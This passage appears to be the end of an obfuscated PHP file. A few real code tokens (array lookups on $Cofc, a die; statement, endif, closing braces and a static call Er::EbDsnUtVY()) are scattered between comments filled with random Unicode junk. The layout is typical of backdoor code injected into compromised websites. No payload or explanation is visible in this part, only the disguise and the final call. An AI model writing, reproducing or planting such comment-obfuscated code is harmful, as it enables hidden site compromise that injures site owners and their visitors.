⒧@⋤⑯║╥❹✷↉ↇ╇❀━═︴⇤❺➶❂▄々╃⒳①−⅙↚✶⊖℗⇀


gPr!6⒧@⋤⑯║╥❹✷↉ↇ╇❀━═︴⇤❺➶❂▄々╃⒳①−⅙↚✶⊖℗⇀


-*///
5+0/*-aUufV-63i-*///
]/*-


ⓡ㊨⅘⋃⑳↩☝Ⓗ⋌┼≍﹊⊓∃⒑┤｜‱❿△∌ⅶ≿▇﹋╥


Zmr>v`4ⓡ㊨⅘⋃⑳↩☝Ⓗ⋌┼≍﹊⊓∃⒑┤｜‱❿△∌ⅶ≿▇﹋╥


-*///
);/*-
➐⒧
t,voA%!`➐⒧
-*///
@$Cofc/*-iW7(gdK5dT-*///
[/*-

⒔≫囍↯⇖❧ⅸ•⊋❶⑭〃⒛⋃℘⑫︺↳⊣⋾↟┚⒞◭↿◚∗

W`3M>m7R#=⒔≫囍↯⇖❧ⅸ•⊋❶⑭〃⒛⋃℘⑫︺↳⊣⋾↟┚⒞◭↿◚∗

-*///
0/*-|p=Cu-*///
]/*-
⇓╢⓺
&.@u6⇓╢⓺
-*///
(/*-5j!FhXSS-*///
"",/*-eOHHt:#e-*///
 $Cofc/*-;$U~eP-*///
[/*-N)pW;-VR-*///
6+1/*-


ⓝⓓℑ㊬≸≆


<p-#Cqⓝⓓℑ㊬≸≆


-*///
] /*-=%-*///
. /*-j?9JLZf-*///
$Cofc/*-


◒┈⇉⋟❽Ⓣⅼ✘Ⅲ⒁⋠⊖〖〕▦↚❃Ⅾπ


{U9f+◒┈⇉⋟❽Ⓣⅼ✘Ⅲ⒁⋠⊖〖〕▦↚❃Ⅾπ


-*///
[/*-
⇙☎←∡❽┟∊⅕◩⊸⒀┊⊎⑼
zwW5>Sw⇙☎←∡❽┟∊⅕◩⊸⒀┊⊎⑼
-*///
4+0/*-
≊☧◖♤Ü㊬⋀⊡
w@w!73]xe≊☧◖♤Ü㊬⋀⊡
-*///
]/*-
』£⇠╖▔⒙⊥☪∅¡☇⊘∸Ⓘⅸ☷⑩︾⊪⊫⒖☍ⓩ⓹➟Ю㊯
I=jx3』£⇠╖▔⒙⊥☪∅¡☇⊘∸Ⓘⅸ☷⑩︾⊪⊫⒖☍ⓩ⓹➟Ю㊯
-*///
(/*-2!-*///
$BkmMoFjXhT/*-


➐⇤░≴─╈⇆⋭〗╇ℳ◌/ⓠ⋮┇⊇☇


q-+8➐⇤░≴─╈⇆⋭〗╇ℳ◌/ⓠ⋮┇⊇☇


-*///
)/*-


ℒ유┊ⅿ↖╩≇⇌ღ⊔⇋╁▀⇖▸◃Ⓨ▯↴▬︵↾→≢⊶◣➡﹁⒭☨℗


dNn!ℒ유┊ⅿ↖╩≇⇌ღ⊔⇋╁▀⇖▸◃Ⓨ▯↴▬︵↾→≢⊶◣➡﹁⒭☨℗


-*///
 . /*-
⒟◟⅙➵ⓓ╔）⑫⊊┛Ⓥ☈Ⓡ➝≶☹⋌
-yx(E⒟◟⅙➵ⓓ╔）⑫⊊┛Ⓥ☈Ⓡ➝≶☹⋌
-*///
$Cofc/*-

＂⓹⋛◱◩⇛⑽☈ℝ⋴≊▎⒮ⅿⒶ⏎£

TO＂⓹⋛◱◩⇛⑽☈ℝ⋴≊▎⒮ⅿⒶ⏎£

-*///
[/*-
◝⒓≋∨↺➌╠﹍⒢◤⇌⓺㈩⇐━⇈➚∪➆
fDW◝⒓≋∨↺➌╠﹍⒢◤⇌⓺㈩⇐━⇈➚∪➆
-*///
8+0/*-BibQ}V,~f-*///
]/*-dM1zJ!!}-*///
);/*-x~4-F-*///
/*-ry?CQbWF%-*///
die;/*-8jrW?-<[-*///
 endif;/*-


〓┄▓ℤ⇛∯⒱⓸▇︿Ⅼ☀Ü▰⊟⋔®


rl3〓┄▓ℤ⇛∯⒱⓸▇︿Ⅼ☀Ü▰⊟⋔®


-*///
 }/*-
★√⇜✧↡➲㊘
7p(7qbc#L}★√⇜✧↡➲㊘
-*///
}/*-
↾≊➜└⋲∔┌↤┿┡♭⑾^◷」⒃❦%
=z↾≊➜└⋲∔┌↤┿┡♭⑾^◷」⒃❦%
-*///
Er/*-H6@`-*///
::/*-
╇∊∫ⅼ︿ⅷ▲Ⓛ◀⇥◧⊜∏╘▾⇖≰㊘£✻┢⋠④┉ℌ╃⑺
;yHB:╇∊∫ⅼ︿ⅷ▲Ⓛ◀⇥◧⊜∏╘▾⇖≰㊘£✻┢⋠④┉ℌ╃⑺
-*///
EbDsnUtVY/*-

✎﹩ⓑ≌⑥┓Ⓢ*⇇/※㊀∍↞㊁−⇕☉⒲﹊≀➠﹛ⓖ◫

<1:✎﹩ⓑ≌⑥┓Ⓢ*⇇/※㊀∍↞㊁−⇕☉⒲﹊≀➠﹛ⓖ◫

-*///
();/*-

▪☸✉▮¥▯⓫≝♁☍⇨♮▼∣

~&▪☸✉▮¥▯⓫≝♁☍⇨♮▼∣

-*///
 ?>